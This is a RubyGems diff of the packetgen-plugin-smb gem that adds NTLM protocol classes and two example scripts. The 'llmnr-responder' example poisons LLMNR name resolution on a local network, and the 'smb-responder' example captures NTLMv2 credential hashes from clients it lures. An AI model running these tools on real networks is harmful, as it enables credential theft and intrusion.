RubyGems - packetgen-plugin-smb - Versions diffs - 0.5.0 → 0.6.0 - Mend

packetgen-plugin-smb 0.5.0 → 0.6.0

Files changed (22) hide show

checksums.yaml +4 -4
data/.travis.yml +3 -3
data/README.md +2 -1
data/examples/llmnr-responder +110 -0
data/examples/smb-responder +233 -0
data/lib/packetgen-plugin-smb.rb +1 -0
data/lib/packetgen/plugin/gssapi.rb +1 -1
data/lib/packetgen/plugin/ntlm.rb +211 -0
data/lib/packetgen/plugin/ntlm/authenticate.rb +197 -0
data/lib/packetgen/plugin/ntlm/av_pair.rb +117 -0
data/lib/packetgen/plugin/ntlm/challenge.rb +140 -0
data/lib/packetgen/plugin/ntlm/negotiate.rb +127 -0
data/lib/packetgen/plugin/ntlm/ntlmv2_response.rb +59 -0
data/lib/packetgen/plugin/smb/filetime.rb +6 -0
data/lib/packetgen/plugin/smb/negotiate/response.rb +1 -1
data/lib/packetgen/plugin/smb/string.rb +28 -3
data/lib/packetgen/plugin/smb2/negotiate/response.rb +5 -1
data/lib/packetgen/plugin/smb2/session_setup/request.rb +5 -1
data/lib/packetgen/plugin/smb2/session_setup/response.rb +5 -1
data/lib/packetgen/plugin/smb_version.rb +1 -1
data/packetgen-plugin-smb.gemspec +8 -3
metadata +17 -9

checksums.yaml CHANGED

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 7aaeb4b048754ed60fdb9f88a6d82dec247a993056617765e48e047d312d0962
-  data.tar.gz: 9c5da64aa7a58e9e7971554cdf435c08b085e2b63f81bacd9d36a19e9b610ac5
+  metadata.gz: 961af27daff2c38b17b266a4f9fd51d643e95b030cba835b3af596d18b93577e
+  data.tar.gz: 6792ca39dc088cbc36a32116b7a45e6b27f2a4bc95752f80262829b46e53701c
 SHA512:
-  metadata.gz: e261d4a050ed4a8ed34a51d106bacc519279256bc95bb75e0998947c6365bf008f4f7e43103b9f86b9526efafd0ee18e5cdb1f9f260fe94e052b309555552b50
-  data.tar.gz: 1c1e0fa328e1272a45ab699168b8cc246df7bf4520f4e2a82d2378ff89706e308dfbd57f50ecd1567800e905959a2672bce3756d1e1d6a59c8838198ae4dde92
+  metadata.gz: b03e45a4d17799b7fada7b096d901bd18b6692fe6afd6d90a563a8f6ae5338a6b82b8f71377f9e996ff73791291eb9b115fb901e50b5f6f114197374c4d3dcd8
+  data.tar.gz: 129ae737bfca356d136dc83e6d370a007458469add87eeddf2236827d6ff280d2ab18627b69e69a26608680bc15cf9a4bbcfba2c4ee4ef0f94f33d4ec19f2462

data/.travis.yml CHANGED

@@ -3,10 +3,10 @@ rvm:
   - 2.3
   - 2.4
   - 2.5
+  - 2.6
 install:
   - sudo apt-get update -qq
   - sudo apt-get install libpcap-dev -qq
-  - bundle install --path vendor/bundle --jobs=3 --retry=3
-script:
-  - bundle exec rake
+  - gem install bundler --version "~>1.17.3"
+  - bundle _1.17.3_ install --path vendor/bundle --jobs=3 --retry=3

data/README.md CHANGED

@@ -15,7 +15,8 @@ This is a plugin for [PacketGen gem](https://github.com/sdaubert/packetgen). It
     * SMB2 common header (support 2.x and 3.x dialects),
     * Negotiate command,
     * SessionSetup command,
-* GSSAPI, used to transport negotiation over SMB2 commands.
+* GSSAPI, used to transport negotiation over SMB2 commands,
+* NTLM, SMB authentication protocol.
 ## Installation

data/examples/llmnr-responder ADDED

@@ -0,0 +1,110 @@
+#!/usr/bin/env ruby
+# This file is part of packetgen-plugin-smb.
+# See https://github.com/sdaubert/packetgen-plugin-smb for more informations
+# Copyright (C) 2018 Sylvain Daubert <sylvain.daubert@laposte.net>
+# This program is published under MIT license.
+#
+# This small example implements a LLMNR responder. It responds to all LLMNR
+# requests on local network, and says requested name is its IP address.
+# frozen_string_literal: true
+require 'optparse'
+require 'socket'
+require 'ipaddr'
+require 'packetgen'
+require 'packetgen-plugin-smb'
+BIND_ADDR = '0.0.0.0'
+class LlmnrResponder
+  attr_reader :socket, :my_ip, :my_ip_data
+  LLMNR_MCAST_ADDR = '224.0.0.252'
+  def initialize
+    @socket = UDPSocket.new
+  end
+  def start(bind_addr:, iface:)
+    @my_ip = Interfacez.ipv4_address_of(iface)
+    @my_ip_data = IPAddr.new(my_ip).hton
+    configure_multicast(my_ip_data)
+    socket.bind(bind_addr, PacketGen::Plugin::LLMNR::UDP_PORT)
+    start_loop
+  end
+  private
+  def log(str)
+    puts "[LLMNR] #{str}"
+  end
+  def configure_multicast(local_ip_bin)
+    mreq = IPAddr.new(LLMNR_MCAST_ADDR).hton + local_ip_bin
+    socket.setsockopt(:IPPROTO_IP, :IP_ADD_MEMBERSHIP, mreq)
+  end
+  def start_loop
+    loop do
+      data, peer = socket.recvfrom(1024)
+      pkt = PacketGen.parse(data, first_header: 'LLMNR')
+      next unless pkt.is?('LLMNR')
+      peer_port = peer[1]
+      peer_ip = peer[3]
+      log "received LLMNR request from #{peer_ip}"
+      # Forge LLMNR response
+      response_pkt = pkt.reply
+      response_pkt.llmnr.qr = true
+      response_pkt.llmnr.qd.each do |question|
+        next unless (question.human_rrclass == 'IN') && (question.human_type == 'A')
+        log "Say to #{peer_ip} #{question.name} is #{my_ip}"
+        answer = { rtype: 'RR', name: question.name, rdata: my_ip_data }
+        response_pkt.llmnr.an << answer
+      end
+      response_pkt.calc
+      next unless response_pkt.llmnr.ancount > 0
+      socket.send(response_pkt.to_s, 0, peer_ip, peer_port)
+    end
+  end
+end
+def parse_options
+  options = {}
+  OptionParser.new do |opts|
+    opts.banner = "Usage: #{$PROGRAM_NAME} [options]"
+    opts.separator ''
+    opts.separator 'Options:'
+    opts.on_tail('-h', '--help', 'Show this message') do
+      puts opts
+      exit
+    end
+    opts.on('-i IFACE', '--interface IFACE', 'interface on which responds') do |iface|
+      options[:iface] = iface
+    end
+  end.parse!
+  options
+end
+def check_options(options)
+  raise 'No interface given' if options[:iface].nil?
+  raise "unknown interface #{options[:iface]}" unless Interfacez.all.include? options[:iface]
+end
+options = parse_options
+check_options options
+LlmnrResponder.new.start(bind_addr: BIND_ADDR, iface: options[:iface])

data/examples/smb-responder ADDED

@@ -0,0 +1,233 @@
+#!/usr/bin/env ruby
+# This file is part of packetgen-plugin-smb.
+# See https://github.com/sdaubert/packetgen-plugin-smb for more informations
+# Copyright (C) 2018 Sylvain Daubert <sylvain.daubert@laposte.net>
+# This program is published under MIT license.
+#
+# This small example implements a SMB responder. It responds to all SMB
+# Negotiate request to capture credentials.
+# Before running it (as root), llmnr-responder should be running.
+# frozen_string_literal: true
+require 'socket'
+require 'securerandom'
+require 'ostruct'
+require 'packetgen'
+require 'packetgen-plugin-smb'
+BIND_ADDR = '0.0.0.0'
+DOMAIN_NAME = 'SMB3'
+COMPUTER_NAME = 'WIN-AZE546CFHTD'
+Thread.abort_on_exception = true
+Credentials = Struct.new(:user, :computer, :challenge, :proof, :response, :ip) do
+  def to_s
+    user = self.user.encode('UTF-8')
+    computer = self.computer.encode('UTF-8')
+    str = +"User: #{user}\nComputer:#{computer} (IP: #{ip})\n"
+    str << "Challenge: #{challenge}\nProof: #{proof}\n"
+    str << "Response: #{response}"
+  end
+end
+class Smb2Responder
+  attr_reader :socket, :guid, :salt
+  NTLMSSP_OID = '1.3.6.1.4.1.311.2.2.10'
+  STATUS_MORE_PROCESSING_REQUIRED = 0xc0000016
+  STATUS_ACCESS_DENIED = 0xc0000022
+  SMB2_SIZE = 8_388_608
+  SMB2_NEGO_RESP_BUFFER = "`\x82\x01<\x06\x06+\x06\x01\x05\x05\x02\xA0\x82\x0100\x82\x01,\xA0\x1A0\x18\x06\n+\x06\x01\x04\x01\x827\x02\x02\x1E\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xA2\x82\x01\f\x04\x82\x01\bNEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x00C%\xB9`\x18\xCE\xC8\xA9\xB7\xB7W\x9B\xC1J\xF5\xC0\x7F\x15\x93\x15k\xE5\x88\n\x9A\\\x9A\xD6\x9EK`\x81\a\xEF\xF7f\xF6\x80\xAA\x17\xE0\xC2\xC5\xE5\xDB\x05\\\v\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xEA\xF9\rM\xB2\xECJ\xE3xn\xC3\bNEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x00C%\xB9`\x18\xCE\xC8\xA9\xB7\xB7W\x9B\xC1J\xF5\xC0\\3S\r\xEA\xF9\rM\xB2\xECJ\xE3xn\xC3\b@\x00\x00\x00X\x00\x00\x000V\xA0T0R0'\x80%0#1!0\x1F\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1F\x06\x03U\x04\x03\x13\x18Token Signing Public Key"
+  SMB2_SALT_LEN = 32
+  def initialize
+    @guid = SecureRandom.uuid
+    @salt = SecureRandom.random_bytes(SMB2_SALT_LEN)
+  end
+  def start(bind_addr:)
+    @socket = TCPServer.new(bind_addr, PacketGen::Plugin::NetBIOS::Session::TCP_PORT2)
+    start_loop
+  end
+  private
+  def log(str)
+    puts "[SMB2] #{str}"
+  end
+  def get_smb_data(sock)
+    PacketGen.parse(sock.recv(1024), first_header: 'NetBIOS::Session')
+  end
+  def smb2_nego_resp1
+    return @resp1_pkt if defined? @resp1_pkt
+    @resp1_pkt = PacketGen.gen('NetBIOS::Session')
+                          .add('SMB2', credit: 1)
+                          .add('SMB2::Negotiate::Response',
+                               dialect: 0x2ff,
+                               server_guid: guid, capabilities: 7,
+                               max_trans_size: SMB2_SIZE,
+                               max_read_size: SMB2_SIZE,
+                               max_write_size: SMB2_SIZE)
+    @resp1_pkt.smb2_negotiate_response[:buffer] = PacketGen::Types::String.new.read(SMB2_NEGO_RESP_BUFFER)
+    @resp1_pkt.calc
+    @resp1_pkt
+  end
+  def first_nego_response
+    pkt = smb2_nego_resp1
+    pkt.smb2_negotiate_response[:system_time] = PacketGen::Plugin::SMB::Filetime.now
+    pkt
+  end
+  def second_nego_response(req_pkt)
+    smb2_req = req_pkt.smb2
+    nego_req = req_pkt.smb2_negotiate_request
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit: 1,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::Negotiate::Response',
+                        dialect: nego_req.dialects.last,
+                        server_guid: guid,
+                        capabilities: 0x2f,
+                        max_trans_size: SMB2_SIZE,
+                        max_read_size: SMB2_SIZE,
+                        max_write_size: SMB2_SIZE,
+                        system_time: PacketGen::Plugin::SMB::Filetime.now,
+                        buffer: PacketGen::Types::String.new.read(SMB2_NEGO_RESP_BUFFER))
+    pkt.smb2_negotiate_response.context_list << { type: 1, salt_length: SMB2_SALT_LEN, salt: salt }
+    pkt.smb2_negotiate_response.context_list.last.hash_alg << PacketGen::Types::Int16le.new(1)
+    pkt.smb2_negotiate_response.context_list << { type: 2 }
+    pkt.smb2_negotiate_response.context_list.last.ciphers << PacketGen::Types::Int16le.new(1)
+    pkt.calc
+    pkt
+  end
+  def first_session_setup_response(req_pkt)
+    smb2_req = req_pkt.smb2
+    setup_req = req_pkt.smb2_sessionsetup_request
+    ntlm_nego = PacketGen::Plugin::NTLM.read(setup_req.buffer[:token_init][:mech_token].value)
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit_charge: 1,
+                        credit: 1,
+                        status: STATUS_MORE_PROCESSING_REQUIRED,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::SessionSetup::Response')
+    ntlm = PacketGen::Plugin::NTLM::Challenge.new
+    ntlm.flags = ntlm_nego.flags | 0x00810000
+    ntlm.flags &= 0xfdffff15
+    ntlm.challenge = [rand(2**64)].pack('q<')
+    ntlm.target_name.read('SMB3')
+    ntlm.target_info << { type: 'DomainName', value: DOMAIN_NAME }
+    ntlm.target_info << { type: 'ComputerName', value: COMPUTER_NAME }
+    ntlm.target_info << { type: 'DnsDomainName', value: "#{DOMAIN_NAME}.local" }
+    ntlm.target_info << { type: 'DnsComputerName', value: "#{COMPUTER_NAME}.local" }
+    ntlm.target_info << { type: 'DnsTreeName', value: "#{DOMAIN_NAME}.local" }
+    ntlm.target_info << { type: 'Timestamp', value: PacketGen::Plugin::SMB::Filetime.now.to_human }
+    ntlm.target_info << { type: 'EOL' }
+    ntlm.calc_length
+    gssapi = pkt.smb2_sessionsetup_response.buffer
+    gssapi[:token_resp][:response].value = ntlm.to_s
+    gssapi[:token_resp][:negstate].value = 'accept-incomplete'
+    gssapi[:token_resp][:supported_mech] = NTLMSSP_OID
+    pkt.calc
+    [pkt, ntlm.challenge]
+  end
+  def deny_access(req_pkt)
+    smb2_req = req_pkt.smb2
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit: 1,
+                        credit_charge: 1,
+                        status: STATUS_ACCESS_DENIED,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::SessionSetup::Response')
+    # Remove buffer
+    pkt.smb2_sessionsetup_response[:buffer] = PacketGen::Types::String.new
+    pkt.calc
+    pkt
+  end
+  def start_loop
+    loop do
+      client = socket.accept
+      to_close = false
+      log "connection from #{client.peeraddr[2]}"
+      credentials = Credentials.new
+      credentials.ip = client.peeraddr.last
+      until to_close
+        rcv_pkt = get_smb_data(client)
+        pkt_to_send = case rcv_pkt.headers.last.protocol_name
+                      when 'SMB::Negotiate::Request'
+                        unless rcv_pkt.smb_negotiate_request.dialects.map(&:to_human).include?('SMB 2.???')
+                          to_close = true
+                          nil
+                        end
+                        first_nego_response
+                      when 'SMB2::Negotiate::Request'
+                        second_nego_response rcv_pkt
+                      when 'SMB2::SessionSetup::Request'
+                        gssapi = rcv_pkt.smb2_sessionsetup_request.buffer
+                        if gssapi[:token_init][:mech_types].value.map(&:value).include?(NTLMSSP_OID)
+                          pkt, challenge = first_session_setup_response(rcv_pkt)
+                          credentials.challenge = binary2hex(challenge)
+                          pkt
+                        else
+                          response = PacketGen::Plugin::NTLM.read(gssapi[:token_resp][:response].value)
+                          if response.is_a?(PacketGen::Plugin::NTLM::Authenticate)
+                            credentials.proof = binary2hex(response.nt_response.response)
+                            credentials.user = response.user_name
+                            credentials.computer = response.workstation
+                            credentials.response = binary2hex(response.nt_response.to_s[response.nt_response[:response].sz..-5])
+                            to_close = true
+                            deny_access rcv_pkt
+                          else
+                            to_close = true
+                            nil
+                          end
+                        end
+                      end
+        client.send(pkt_to_send.to_s, 0) if pkt_to_send
+        client.close if to_close
+        puts credentials.to_s unless credentials.response.nil?
+      end
+    end
+  end
+  def binary2hex(str)
+    str.unpack('H*').first
+  end
+end
+Smb2Responder.new.start(bind_addr: BIND_ADDR)

data/lib/packetgen-plugin-smb.rb CHANGED

@@ -12,3 +12,4 @@ require_relative 'packetgen/plugin/netbios'
 require_relative 'packetgen/plugin/smb'
 require_relative 'packetgen/plugin/smb2'
 require_relative 'packetgen/plugin/llmnr'
+require_relative 'packetgen/plugin/ntlm'

data/lib/packetgen/plugin/gssapi.rb CHANGED

@@ -101,7 +101,7 @@ module PacketGen::Plugin
                      model(:token_resp, NegTokenResp)]
     # @param [Hash] args
-    # @param [Symbol] :type +:init+ or +:response+ to force selection of
+    # @option args [Symbol] :token +:init+ or +:response+ to force selection of
     #  token CHOICE.
     def initialize(args={})
       token = args.delete(:token)

data/lib/packetgen/plugin/ntlm.rb ADDED

@@ -0,0 +1,211 @@
+# This file is part of packetgen-plugin-smb.
+# See https://github.com/sdaubert/packetgen-plugin-smb for more informations
+# Copyright (C) 2018 Sylvain Daubert <sylvain.daubert@laposte.net>
+# This program is published under MIT license.
+# frozen_string_literal: true
+module PacketGen::Plugin
+  # Base class for NTLM authentication protocol.
+  # @author Sylvain Daubert
+  class NTLM < PacketGen::Types::Fields
+    # NTLM message types
+    TYPES = {
+      'negotiate' => 1,
+      'challenge' => 2,
+      'authenticate' => 3
+    }.freeze
+    # NTLM signature
+    SIGNATURE = "NTLMSSP\0"
+    # void version
+    VOID_VERSION = [0].pack('q').freeze
+    VOID_CHALLENGE = VOID_VERSION
+    # @!attribute signature
+    #  8-byte NTLM signature
+    #  @return [String]
+    define_field :signature, PacketGen::Types::String, static_length: 8, default: SIGNATURE
+    # @!attribute type
+    #  4-byte message type
+    #  @return [Integer]
+    define_field :type, PacketGen::Types::Int32leEnum, enum: TYPES
+    # @!attribute payload
+    #  @return [String]
+    define_field :payload, PacketGen::Types::String
+    class <<self
+      # @api private
+      # Return fields defined in payload one.
+      # @return [Hash]
+      attr_accessor :payload_fields
+      # Create a NTLM object from a binary string
+      # @param [String] str
+      # @return [NTLM]
+      def read(str)
+        ntlm = self.new.read(str)
+        type = TYPES.key(ntlm.type)
+        return ntlm if type.nil?
+        klass = NTLM.const_get(type.capitalize)
+        klass.new.read(str)
+      end
+      # Define a flags field.
+      # @return [void]
+      def define_negotiate_flags
+        define_field_before :payload, :flags, PacketGen::Types::Int32le
+        define_bit_fields_on :flags, :flags_w, :flags_v, :flags_u, :flags_r13, 3,
+                             :flags_t, :flags_r4, :flags_s, :flags_r,
+                             :flags_r5, :flags_q, :flags_p, :flags_r6,
+                             :flags_o, :flags_n, :flags_m, :flags_r7,
+                             :flags_l, :flags_k, :flags_j, :flags_r8,
+                             :flags_h, :flags_r9, :flags_g, :flags_f,
+                             :flags_e, :flags_d, :flags_r10, :flags_c,
+                             :flags_b, :flags_a
+        alias_method :nego56?, :flags_w?
+        alias_method :key_exch?, :flags_v?
+        alias_method :nego128?, :flags_u?
+        alias_method :version?, :flags_t?
+        alias_method :target_info?, :flags_s?
+        alias_method :non_nt_session_key?, :flags_r?
+        alias_method :identify?, :flags_q?
+        alias_method :ext_session_security?, :flags_p?
+        alias_method :target_type_server?, :flags_o?
+        alias_method :target_type_domain?, :flags_n?
+        alias_method :always_sign?, :flags_m?
+        alias_method :oem_workstation_supplied?, :flags_l?
+        alias_method :oem_domain_supplied?, :flags_k?
+        alias_method :anonymous?, :flags_j?
+        alias_method :ntlm?, :flags_h?
+        alias_method :lm_key?, :flags_g?
+        alias_method :datagram?, :flags_f?
+        alias_method :seal?, :flags_e?
+        alias_method :sign?, :flags_d?
+        alias_method :request_target?, :flags_c?
+        alias_method :oem?, :flags_b?
+        alias_method :unicode?, :flags_a?
+        alias_method :old_flags_a=, :flags_a=
+        alias_method :old_flags=, :flags=
+        class_eval do
+          def flags_a=(value)
+            self.old_flags_a = value
+            self.class.payload_fields.each do |name, _|
+              attr = send(name)
+              attr.unicode = value if attr.respond_to?(:unicode=)
+            end
+            value
+          end
+          def flags=(value)
+            self.old_flags = value
+            self.flags_a = value & 1
+          end
+        end
+      end
+      # Define a field in payload. Also add +name_len+, +name_maxlen+ and
+      # +name_offset+ fields.
+      # @param [Symbol] name name of field.
+      # @param [Class,nil] type type of +name+ field.
+      # @param [Hash] options type's options needed at build time
+      # @return [void]
+      def define_in_payload(name, type=SMB::String, options={})
+        @payload_fields ||= {}
+        @payload_fields[name] = [type, options]
+        define_field_before :payload, :"#{name}_len", PacketGen::Types::Int16le
+        define_field_before :payload, :"#{name}_maxlen", PacketGen::Types::Int16le
+        define_field_before :payload, :"#{name}_offset", PacketGen::Types::Int32le
+        attr_accessor name
+      end
+    end
+    # @abstract This method is meaningful for {NTLM} subclasses only.
+    def initialize(options={})
+      super
+      return if self.class.payload_fields.nil?
+      self.class.payload_fields.each do |name, type_and_opt|
+        type, options = type_and_opt
+        content = if type.new.respond_to?(:unicode?)
+                    type.new(options.merge(unicode: unicode?))
+                  else
+                    type.new(options)
+                  end
+        send(:"#{name}=", content)
+      end
+    end
+    # @abstract This class is meaningful for {NTLM} subclasses only.
+    # Populate object from a binary string
+    # @param [String] str
+    # @return [self]
+    def read(str)
+      super
+      return self if self.class.payload_fields.nil?
+      self.class.payload_fields.each do |name, type_and_opt|
+        type, options = type_and_opt
+        offset_in_payload = send(:"#{name}_offset") - offset_of(:payload)
+        length = send(:"#{name}_len")
+        content = if type.new.respond_to?(:unicode?)
+                    type.new(options.merge(unicode: unicode?))
+                  else
+                    type.new(options)
+                  end
+        content.read(payload[offset_in_payload, length]) if length > 0
+        send(:"#{name}=", content)
+      end
+      self
+    end
+    # @abstract This class is meaningful for {NTLM} subclasses only.
+    # Calculate and set +len+, +maxlen+ and +offset+ fields defined for
+    # fields in {#payload}.
+    # @return [void]
+    def calc_length
+      return self if self.class.payload_fields.nil?
+      previous_len = 0
+      self.class.payload_fields.each do |name, _type_and_opt|
+        send(:"#{name}_len=", 0)
+        send(:"#{name}_offset=", offset_of(:payload) + previous_len)
+        field = send(name)
+        next unless field && !field.empty?
+        length = field.respond_to?(:sz) ? field.sz : field.size
+        send(:"#{name}_len=", length)
+        send(:"#{name}_maxlen=", length)
+        previous_len = length
+      end
+    end
+    # @abstract This class is meaningful for {NTLM} subclasses only.
+    # @return [String]
+    def to_s
+      s = super
+      return s if self.class.payload_fields.nil?
+      self.class.payload_fields.each do |name, _type_and_opt|
+        attr = send(name)
+        attr.unicode = unicode? if attr.respond_to?(:unicode=)
+        s << attr.to_s unless attr.nil? || send("#{name}_len").zero?
+      end
+      s
+    end
+  end
+end
+require_relative 'ntlm/av_pair'
+require_relative 'ntlm/ntlmv2_response'
+require_relative 'ntlm/negotiate'
+require_relative 'ntlm/challenge'
+require_relative 'ntlm/authenticate'